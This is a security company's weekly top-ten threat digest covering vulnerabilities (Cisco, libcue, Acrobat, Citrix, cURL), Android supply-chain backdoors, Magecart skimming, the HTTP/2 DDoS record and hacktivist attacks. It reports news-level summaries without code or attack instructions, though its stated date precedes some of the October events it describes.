WEEKLY TOP TEN | SEPTEMBER 25, 2023 15:00 GMT
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The following top 10 stories were selected from the 40+ original ones we determined to be most significant during the course of the week, ranking by highest risk and using multiple sources when available:
- Critical Vulnerability in Cisco Emergency Responder Software
911 operators use the Cisco Emergency Responder software to identify the location of a caller and route the incoming call to the appropriate emergency services. Cisco disclosed a vulnerability in this software with a nearly perfect 9.8/10 CVSS score (CVE-2023-20101). This vulnerability allows attackers to gain access to the root accounts of effected systems due to using static credentials, giving the threat actor complete control. - Factory-Loaded Backdoors Observed on Several Android Devices
Researchers at Human Security discovered several cheap Android TV devices and tablets that came from the manufacturer with pre-installed malware. They additionally state that they have found over two hundred different Android TV devices that they categorize into two types of fraud. Badbox (compromised Android devices) and Peachpit (advertisement fraud involving 39 iOS and Android applications). Researchers also found that vendors of some of these BadBox devices were selling access to home networks, with one company claiming over twenty million devices worldwide. - Desktop Linux Vulnerable to Remote Code Execution via LibCue
Libcue is a library used in GNOME, the most popular desktop environment for Linux devices. A security advisory was raised in the libcue GitHub repository, in which it details the vulnerability, allowing threat actors to gain remote code execution via the download of a malicious [.]cue file. This vulnerability (CVE-2023-43641) was given a CVSS score of 8.8. - Hacktivists Join the Fray in the Israel-Palestine Conflict
As the conflict between Israel and Palestine continues to escalate, hackers on both sides have been seen attacking critical infrastructure. The Pro-Palestinian hacker group AnonGhost breached the Israeli RedAlert app, sending thousands of phones fake alerts indicating inbound missiles from the Gaza region, with some phony alerts even regarding inbound nuclear warheads. Pro-Israeli hacker groups have also been observed targeting ICS (industrial control systems) in the Gaza Strip. - Adobe Acrobat Vulnerability Exploited in the Wild
A use-after-free vulnerability that allows for remote code execution was discovered in Adobe Acrobat earlier this year. This vulnerability has just been added to the KEV (Known Exploited Vulnerabilities) list by CISA. CVE-2023-21608 allows attackers to gain access to systems via a malicious PDF. Patches were released earlier this year; the most recent versions of Acrobat are not vulnerable. - Magecart Hides Card Skimming Code in 404 Error Pages
The cybercriminals responsible for the Magecart attack have started using a fresh method to conceal their malicious code. Akamai released an advisory stating that these threat actors have modified pages with non-existent icons that call to the site’s default 404 error page. On these error pages, a comment has been placed containing malicious JavaScript, making it invisible to the average user. This malicious code, combined with the fake payment pages crafted by these attackers, allows for the theft of payment card information. - Vulnerability in Citrix NetScaler Login Pages Allows for Credential Theft
A critical vulnerability in Citrix NetScaler (CVE-2023-3519) was discovered in July, however, since then, it has been seen in widespread usage by threat actors, with Bleeping Computer estimating at least two thousand exploited servers by mid-August. Attackers have been seen using this remote-code execution vulnerability to inject JavaScript code into login pages to harvest user credentials. IAB (Initial Access Brokers), which have been prominent in the ransomware lifecycle in recent months, is most likely to sell these credentials. - Cloudflare, Google, Microsoft, and Amazon Observed Record-Breaking DDoS Attack
Threat actors exploited a vulnerability in the HTTP/2 protocol to perform the largest ever DDoS attack to date. Google recorded 398 million requests per second, which is seven and a half times more than the previous record-holder, Cloudflare, who recorded 46 million requests per second. The target companies mostly mitigated these attacks, which did not appear to result in any service outages. - ‘Legitimate’ Looking WordPress Plugin Created a Backdoor
Defiantly, a WordPress security firm discovered a malicious plugin during an incident response regarding a compromised site. This plugin was described as ‘professional looking’ and masked itself under the guise of a caching plugin. After this plugin was installed, it applied filters to the administrator panel, hiding its presence. This plugin provides a backdoor with heartbeat functionality, allowing the attacker to know if the infected webserver is online. It also shows end-user spam advertising and even redirects to suspicious websites. - cURL Patches Two High-Severity Vulnerabilities
The maintainers of cURL, an extremely popular command-line utility for making web requests, revealed on 10/2 that two high-severity vulnerabilities were discovered in cURL and scheduled a patch date of 10/11. This announcement caused a large stir in the security community as everyone anxiously waited for more details. Patches have now been released, and the CVEs 2023-38545 (CVSS score: 7.5) and 2023-38546 (CVSS score: 5.0) are heap buffer overflow and cookie injection, respectively. These vulnerabilities did not live up to the buzz they generated; however, they still pose a threat, and updates to the newest version should be applied.
